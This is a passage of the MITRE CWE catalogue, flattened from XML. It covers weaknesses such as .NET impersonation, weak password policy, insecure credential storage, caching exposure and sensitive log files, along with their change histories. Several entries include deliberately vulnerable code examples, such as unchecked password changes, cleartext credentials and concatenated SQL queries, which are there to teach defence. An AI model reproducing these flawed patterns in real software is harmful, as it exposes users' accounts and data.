- updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Multiple Trailing Slash - /multiple/trailing/slash// - - - - Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks. - .NET server applications can optionally execute using the identity of the user authenticated to the client. The intention of this functionality is to bypass authentication and access control checks within the .NET application code. Authentication is done by the underlying web server (Microsoft Internet Information Service IIS), which passes the authenticated token, or unauthenticated anonymous token, to the .NET application. Using the token to impersonate the client, the application then relies on the settings within the NTFS directories and files to control access. Impersonation enables the application, on the server running the .NET application, to both execute code and access resources in the context of the authenticated and authorized user. - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Operation - Run the application with limited privilege to the underlying operating and file system. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - .NET Misconfiguration: Impersonation - - - - The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts. - Authentication mechanisms often rely on a memorized secret (also known as a password) to provide an assertion of identity for a user of a system. It is therefore important that this password be of sufficient complexity and impractical for an adversary to guess. The specific requirements around how complex a password needs to be depends on the type of system being protected. Selecting the correct password requirements and enforcing them through implementation are critical to the overall success of the authentication mechanism. - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - Not enforcing the password policy stated in a products design can allow users to create passwords that do not provide the necessary level of protection. - - - - - Access Control - Gain Privileges or Assume Identity - An attacker could easily guess user passwords and gain access user accounts. - - - - - Architecture and Design - - A product's design should require adherance to an appropriate password policy. Specific password requirements depend strongly on contextual factors, but it is recommended to contain the following attributes: - - - Enforcement of a minimum and maximum length - Restrictions against password reuse - Restrictions against using common passwords - Restrictions against using contextual string in the password (e.g., user id, app name) - - Depending on the threat model, the password policy may include several additional attributes. - - Complex passwords requiring mixed character sets (alpha, numeric, special, mixed case) - - Increasing the range of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication. - Unfortunately, a complex password may be difficult to memorize, encouraging a user to select a short password or to incorrectly manage the password (write it down). - Another disadvantage of this approach is that it often does not result in a significant increases in overal password complexity due to people's predictable usage of various symbols. - - - Large Minimum Length (encouraging passphrases instead of passwords) - - Increasing the number of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication. - A disadvantage of this approach is that selecting a good passphrase is not easy and poor passwords can still be generated. Some prompting may be needed to encourage long un-predictable passwords. - - - Randomly Chosen Secrets - - Generating a password for the user can help make sure that length and complexity requirements are met, and can result in secure passwords being used. - A disadvantage of this approach is that the resulting password or passpharse may be too difficult to memorize, encouraging them to be written down. - - - Password Expiration - - Requiring a periodic password change can reduce the time window that an adversary has to crack a password, while also limiting the damage caused by password exposures at other locations. - Password expiration may be a good mitigating technique when long complex passwords are not desired. - - - - - See NIST 800-63B https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf Sections: 5.1.1, 10.2.1, and Appendix A for further information on password requirements. - - - - Architecture and Design - Consider a second - authentication factor beyond the password, which prevents the - password from being a single point of failure. See CWE-308 for - further information. - - - Implementation - Consider implementing a password complexity meter to inform users when a chosen password meets the required attributes. - - - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - - - - - - - - - - - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Modes_of_Introduction, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - An attacker could gain access to user accounts and access sensitive data used by the user accounts. - - - - - Architecture and Design - Use an appropriate security mechanism to protect the credentials. - - - Architecture and Design - Make appropriate use of cryptography to protect the credentials. - - - Implementation - Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.). - - - - - This code changes a user's password. - - $user = $_GET['user'];$pass = $_GET['pass'];$checkpass = $_GET['checkpass'];if ($pass == $checkpass) {SetUserPassword($user, $pass);} - - While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user's password and gain control of the victim's account. - - - The following code reads a password from a properties file and uses the password to connect to a database. - - ...Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = prop.getProperty("password");DriverManager.getConnection(url, usr, password);... - - This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system. - - - The following code reads a password from the registry and uses the password to create a new network credential. - - ...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);... - - This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system - - - Both of these examples verify a password by comparing it to a stored compressed version. - - int VerifyAdmin(char *password) {if (strcmp(compress(password), compressed_password)) {printf("Incorrect Password!\n");return(0);}printf("Entering Diagnostic Mode...\n");return(1);} - - - int VerifyAdmin(String password) {if (passwd.Equals(compress(password), compressed_password)) {return(0);} - //Diagnostic Mode - return(1);} - - Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database. - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - CVE-2007-0681 - Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681 - - - CVE-2000-0944 - Web application password change utility doesn't check the original password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944 - - - CVE-2005-3435 - product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435 - - - CVE-2005-0408 - chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408 - - - - - A7 - Broken Authentication and Session Management - CWE More Specific - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - - - - - - - - - - - - - - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server. - - - - - - SSL (Secure Socket Layer) provides data confidentiality and integrity to HTTP. By encrypting HTTP messages, SSL protects from attackers eavesdropping or altering message contents. - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Operation - System Configuration - Enforce SSL use for the login page or any page used to transmit user credentials or other sensitive information. Even if the entire site does not use SSL, it MUST use SSL for login. Additionally, to help prevent phishing attacks, make sure that SSL serves the login page. SSL allows the user to verify the identity of the server to which they are connecting. If the SSL serves login page, the user can be certain they are talking to the proper end system. A phishing attack would typically redirect a user to a site that does not have a valid trusted server certificate issued from an authorized supplier. - - - - - SFP23 - Exposed Data - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships, Type - - - - - The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere. - - Applications may use caches to improve efficiency when communicating with remote entities or performing intensive calculations. A cache maintains a pool of objects, threads, connections, pages, financial data, passwords, or other resources to minimize the time it takes to initialize and access these resources. If the cache is accessible to unauthorized actors, attackers can read the cache and obtain this sensitive information. - - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Protect information stored in cache. - - - Architecture and Design - Do not store unnecessarily sensitive information in the cache. - - - Architecture and Design - Consider using encryption in the cache. - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - Information Leak Through Caching - Information Exposure Through Caching - - - - The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached. - - - - - - Implementation - - - - - Confidentiality - Read Application Data - Browsers often store information in a client-side cache, which can leave behind sensitive information for other users to find and exploit, such as passwords or credit card numbers. The locations at most risk include public terminals, such as those in libraries and Internet cafes. - - - - - Architecture and Design - Protect information stored in cache. - - - Architecture and Design - Implementation - Use a restrictive caching policy for forms and web pages that potentially contain sensitive information. - - - Architecture and Design - Do not store unnecessarily sensitive information in the cache. - - - Architecture and Design - Consider using encryption in the cache. - - - - - A2 - Broken Access Control - CWE More Specific - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Information Leak Through Browser Caching - Information Exposure Through Browser Caching - - - - Environmental variables may contain sensitive information about a remote server. - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Protect information stored in environment variable from being exposed to the user. - - - - - SFP23 - Exposed Data - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Environmental Variables - Information Exposure Through Environmental Variables - - - - The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors. - Version control repositories such as CVS or git store version-specific metadata and other details within subdirectories. If these subdirectories are stored on a web server or added to an archive, then these could be used by an attacker. This information may include usernames, filenames, path root, IP addresses, and detailed "diff" data about how files have been changed - which could reveal source code snippets that were never intended to be made public. - - - - - - Operation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - Read Files or Directories - - - - - Operation - Distribution - System Configuration - Recommendations include removing any CVS directories and repositories from the production server, disabling the use of remote CVS repositories, and ensuring that the latest CVS patches and version updates have been performed. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Information Leak Through CVS Repository - Exposure of CVS Repository to an Unauthorized Control Sphere - - - - The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors. - - - - - - Operation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - Read Files or Directories - - - - - System Configuration - Protect the core dump files from unauthorized access. - - - - - MEM06-C - Ensure that sensitive data is not written out to disk - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - Information Leak Through Core Dump Files - - - - The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere. - Exposure of these access control list files may give the attacker information about the configuration of the site or system. This information may then be used to bypass the intended security policy or identify trusted systems from which an attack can be launched. - - - - - - Operation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - System Configuration - Protect access control list files. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Information Leak Through Access Control List Files - - - - A software system that accepts path input in the form of multiple internal backslash ('\multiple\trailing\\slash') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - \multiple\\internal\backslash - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Multiple Internal Backslash - \multiple\\internal\backslash - - - - A backup file is stored in a directory or archive that is made accessible to unauthorized actors. - Often, older backup files are renamed with an extension such as .~bk to distinguish them from production files. The source code for old files that have been renamed in this manner and left in the webroot can often be retrieved. This renaming may have been performed automatically by the web server, or manually by the administrator. - - - - - - Operation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site. - - - - - Policy - Recommendations include implementing a security policy within your organization that prohibits backing up web application source code in the webroot. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - Information Leak Through Backup (.~bk) Files - - - - Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions. - - - - - - Testing - - - - - Confidentiality - Read Application Data - - - - - Distribution - Installation - Remove test code before deploying the application into production. - - - - - Examples of common issues with test applications include administrative functions, listings of usernames, passwords or session identifiers and information about the system, server or application configuration. - - - - - SFP28 - Unexpected access points - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships, Time_of_Introduction - - Information Leak Through Test Code - Information Exposure Through Test Code - - - - Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information. - - While logging all information may be helpful during development stages, it is important that logging levels be set appropriately before a product ships so that sensitive user data and system information are not accidentally exposed to potential attackers. - Different log files may be produced and stored for: - - Server log files (e.g. server.log). This can give information on whatever application left the file. Usually this can give full path names and system information, and sometimes usernames and passwords. - log files that are used for debugging - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - Operation - - - Medium - - - Confidentiality - Read Application Data - Logging sensitive user data often provides attackers with an additional, less-protected path to acquiring the information. - - - - - Architecture and Design - Implementation - Consider seriously the sensitivity of the information written into log files. Do not write secrets into the log files. - - - Distribution - Remove debug log files before deploying the application into production. - - - Operation - Protect log files against unauthorized read/write. - - - Implementation - Adjust configurations appropriately when software is transitioned from a debug state to production. - - - - - In the following code snippet, a user's full name and credit card number are written to a log file. - - logger.info("Username: " + usernme + ", CCN: " + ccn); - - - - This code stores location information about the current user: - - locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation()); - ... - - catch (Exception e) {AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage("Sorry, this application has experienced an error.");AlertDialog alert = builder.create();alert.show();Log.e("ExampleActivity", "Caught exception: " + e + " While on User:" + User.toString());} - - When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user's location is also written to the log. - - - In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. - - public BankAccount getUserBankAccount(String username, String accountNumber) { - BankAccount userAccount = null;String query = null;try {if (isAuthorizedUser(username)) {query = "SELECT * FROM accounts WHERE owner = "+ username + " AND accountID = " + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);}} catch (SQLException ex) {String logMessage = "Unable to retrieve account information from database,\nquery: " + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);}return userAccount; - } - - The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. - - - - - CVE-2017-9615 - verbose logging stores admin credentials in a world-readablelog file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615 - - - CVE-2018-1999036 - SSH password for private key stored in build log - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036 - - - - - FIO13-J - Do not log sensitive information outside a trust boundary - - - SFP23 - Exposed Data - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Description, Likelihood_of_Exploit, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Description, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Name, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples, Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships, Type - - - Fortify Software - 2009-07-15 - Portions of Mitigations, Consequences and Description derived from content submitted by Fortify Software. - - Information Leak Through Log Files - Information Exposure Through Log Files - Inclusion of Sensitive Information in Log Files - - - - This entry has been deprecated because its abstraction was too low-level. See CWE-532. - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Affected_Resources, Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Information Leak Through Server Log Files - Information Exposure Through Server Log Files - - - - This entry has been deprecated because its abstraction was too low-level. See CWE-532. - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric 